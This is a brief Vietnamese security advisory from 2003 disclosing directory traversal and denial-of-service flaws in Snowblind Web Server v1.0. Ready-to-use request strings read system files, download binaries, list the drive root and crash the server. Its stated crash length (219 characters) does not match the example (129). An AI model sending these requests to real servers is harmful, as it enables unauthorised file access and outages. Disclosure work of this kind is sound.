Lỗi bảo mật ở Server Snowblind

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: Snowblind Web Server: multiple issues
product: Snowblind Web Server v1.0
vendor: www.snowblind.net
risk: high
date: 05/16/2k3
tested platform: Windows 98 Second Edition
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
Mô tả:
Có 2 lỗi : directory traversal và DoS attacks.
directory traversal

1. Bạn có thể đọc hay download bất kỳ file nào ở thư mục gốc của site:

+http://hostname/../../windows/system.ini

hoặc

+http://hostname/internal.sws?../../windows/system.ini

2. bạn cũng có thể download bất kỳ file binary nào:

+http://hostname/internal.sws?../../windows/calc.exe

yêu cầu này sẽ download file chương trình calc.exe với cái tên là internal.sws

+http://hostname/internal.sws?sws.exe

download webserver itself )).
3. Liệt kê thư mục của webroot.

chú ý: bug này sẽ hoạt động nếu 'Allow directory listings' được bật lên [ mặc
định đã như thế rồi ].

+http://hostname/.../

sẽ in ra nội dung của thư mục root ở ổ đĩa của servẻ.

Denial of Service
1. url này sẽ crash webserver:

+http://localhost/</
2. nếu bạn gửi yêu cầu GET, mà có chứa hơn >=219 ký tự, thì sẽ crash server..


ví dụ yêu cầu:

GET /fff[ x 129 ]ffff HTTP/1.0